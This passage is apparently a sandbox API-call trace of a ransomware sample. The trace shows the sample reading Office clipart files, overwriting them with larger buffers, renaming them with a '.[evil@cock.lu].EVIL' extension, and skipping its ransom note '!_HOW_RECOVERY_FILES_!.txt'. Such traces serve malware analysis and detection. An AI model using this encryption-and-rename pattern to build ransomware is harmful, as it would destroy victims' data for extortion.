lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x43e0, lpOverlapped=0x0) returned 1 [0133.235] CloseHandle (hObject=0x1a8) returned 1 [0133.235] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0133.236] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0133.236] __uncaught_exception () returned 0x84b1160800 [0133.236] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0133.236] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103058.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103058.wmf.[evil@cock.lu].evil")) returned 1 [0133.237] ??_V@YAXPEAX@Z () returned 0x1 [0133.239] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF", dwFileAttributes=0x200) returned 0 [0133.239] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0133.239] wcsstr (_Str="J0103262.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0133.239] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF") returned 69 [0133.239] wcscmp (_String1="J0103262.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0133.239] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0103262.WMF") returned 0x0 [0133.239] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF") returned 0x45 [0133.239] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103262.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0133.303] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3264, lpOverlapped=0x0) returned 1 [0133.703] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.703] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.703] _errno () returned 0x84b1160840 [0133.703] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.703] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x3280, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3280, lpOverlapped=0x0) returned 1 [0133.703] CloseHandle (hObject=0x1a8) returned 1 [0133.703] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0133.704] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0133.704] __uncaught_exception () returned 0x84b1160800 [0133.704] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0133.704] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103262.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103262.wmf.[evil@cock.lu].evil")) returned 1 [0133.705] ??_V@YAXPEAX@Z () returned 0x1 [0133.707] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF", dwFileAttributes=0x200) returned 0 [0133.707] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0133.707] wcsstr (_Str="J0103402.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0133.707] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF") returned 69 [0133.707] wcscmp (_String1="J0103402.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0133.707] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0103402.WMF") returned 0x0 [0133.707] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF") returned 0x45 [0133.707] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103402.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0133.709] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xaf94, lpOverlapped=0x0) returned 1 [0133.728] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.728] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.728] _errno () returned 0x84b1160840 [0133.728] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.729] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xafa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xafa0, lpOverlapped=0x0) returned 1 [0133.729] CloseHandle (hObject=0x1a8) returned 1 [0133.729] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0133.729] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0133.729] __uncaught_exception () returned 0x84b1160800 [0133.729] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0133.731] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103402.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103402.wmf.[evil@cock.lu].evil")) returned 1 [0133.732] ??_V@YAXPEAX@Z () returned 0x1 [0133.735] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF", dwFileAttributes=0x200) returned 0 [0133.735] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0133.735] wcsstr (_Str="J0103812.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0133.735] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF") returned 69 [0133.735] wcscmp (_String1="J0103812.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0133.735] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0103812.WMF") returned 0x0 [0133.735] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF") returned 0x45 [0133.735] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103812.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0133.747] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1714, lpOverlapped=0x0) returned 1 [0133.791] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.791] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.791] _errno () returned 0x84b1160840 [0133.791] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.791] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1720, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1720, lpOverlapped=0x0) returned 1 [0133.791] CloseHandle (hObject=0x1a8) returned 1 [0133.792] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0133.792] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0133.792] __uncaught_exception () returned 0x84b1160800 [0133.792] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0133.792] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103812.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103812.wmf.[evil@cock.lu].evil")) returned 1 [0133.794] ??_V@YAXPEAX@Z () returned 0x1 [0133.796] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF", dwFileAttributes=0x200) returned 0 [0133.797] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0133.797] wcsstr (_Str="J0103850.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0133.797] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF") returned 69 [0133.797] wcscmp (_String1="J0103850.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0133.797] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0103850.WMF") returned 0x0 [0133.797] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF") returned 0x45 [0133.797] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103850.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0133.798] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5c2c, lpOverlapped=0x0) returned 1 [0133.816] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.817] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.817] _errno () returned 0x84b1160840 [0133.817] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.817] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x5c40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5c40, lpOverlapped=0x0) returned 1 [0133.817] CloseHandle (hObject=0x1a8) returned 1 [0133.817] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0133.817] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0133.817] __uncaught_exception () returned 0x84b1160800 [0133.817] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0133.817] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103850.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103850.wmf.[evil@cock.lu].evil")) returned 1 [0133.818] ??_V@YAXPEAX@Z () returned 0x1 [0133.821] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF", dwFileAttributes=0x200) returned 0 [0133.821] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0133.821] wcsstr (_Str="J0105230.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0133.821] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF") returned 69 [0133.821] wcscmp (_String1="J0105230.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0133.821] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105230.WMF") returned 0x0 [0133.821] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF") returned 0x45 [0133.821] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105230.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0133.888] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1434, lpOverlapped=0x0) returned 1 [0133.914] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.914] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.914] _errno () returned 0x84b1160840 [0133.914] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.914] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1440, lpOverlapped=0x0) returned 1 [0133.914] CloseHandle (hObject=0x1a8) returned 1 [0133.914] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0133.915] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0133.915] __uncaught_exception () returned 0x84b1160800 [0133.915] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0133.915] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105230.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105230.wmf.[evil@cock.lu].evil")) returned 1 [0133.916] ??_V@YAXPEAX@Z () returned 0x1 [0133.920] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105230.WMF", dwFileAttributes=0x200) returned 0 [0133.920] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0133.920] wcsstr (_Str="J0105232.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0133.920] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF") returned 69 [0133.920] wcscmp (_String1="J0105232.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0133.920] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105232.WMF") returned 0x0 [0133.920] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF") returned 0x45 [0133.920] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105232.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0133.928] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1600, lpOverlapped=0x0) returned 1 [0133.935] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.935] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.935] _errno () returned 0x84b1160840 [0133.935] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.935] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1620, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1620, lpOverlapped=0x0) returned 1 [0133.935] CloseHandle (hObject=0x1a8) returned 1 [0133.936] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0133.936] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0133.936] __uncaught_exception () returned 0x84b1160800 [0133.936] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0133.936] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105232.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105232.wmf.[evil@cock.lu].evil")) returned 1 [0133.937] ??_V@YAXPEAX@Z () returned 0x1 [0133.939] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105232.WMF", dwFileAttributes=0x200) returned 0 [0133.940] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0133.940] wcsstr (_Str="J0105234.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0133.940] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF") returned 69 [0133.940] wcscmp (_String1="J0105234.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0133.940] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105234.WMF") returned 0x0 [0133.940] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF") returned 0x45 [0133.940] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105234.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0133.958] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd74, lpOverlapped=0x0) returned 1 [0133.998] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.998] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.998] _errno () returned 0x84b1160840 [0133.998] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.998] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0xd80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd80, lpOverlapped=0x0) returned 1 [0133.999] CloseHandle (hObject=0x1a8) returned 1 [0133.999] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0133.999] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0133.999] __uncaught_exception () returned 0x84b1160800 [0133.999] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0134.000] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105234.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105234.wmf.[evil@cock.lu].evil")) returned 1 [0134.001] ??_V@YAXPEAX@Z () returned 0x1 [0134.004] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105234.WMF", dwFileAttributes=0x200) returned 0 [0134.004] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0134.004] wcsstr (_Str="J0105238.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0134.004] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF") returned 69 [0134.004] wcscmp (_String1="J0105238.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0134.005] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105238.WMF") returned 0x0 [0134.005] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF") returned 0x45 [0134.005] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105238.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0134.021] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4314, lpOverlapped=0x0) returned 1 [0134.045] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0134.045] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0134.045] _errno () returned 0x84b1160840 [0134.045] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.045] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x4320, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4320, lpOverlapped=0x0) returned 1 [0134.046] CloseHandle (hObject=0x1a8) returned 1 [0134.046] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0134.046] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0134.046] __uncaught_exception () returned 0x84b1160800 [0134.046] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 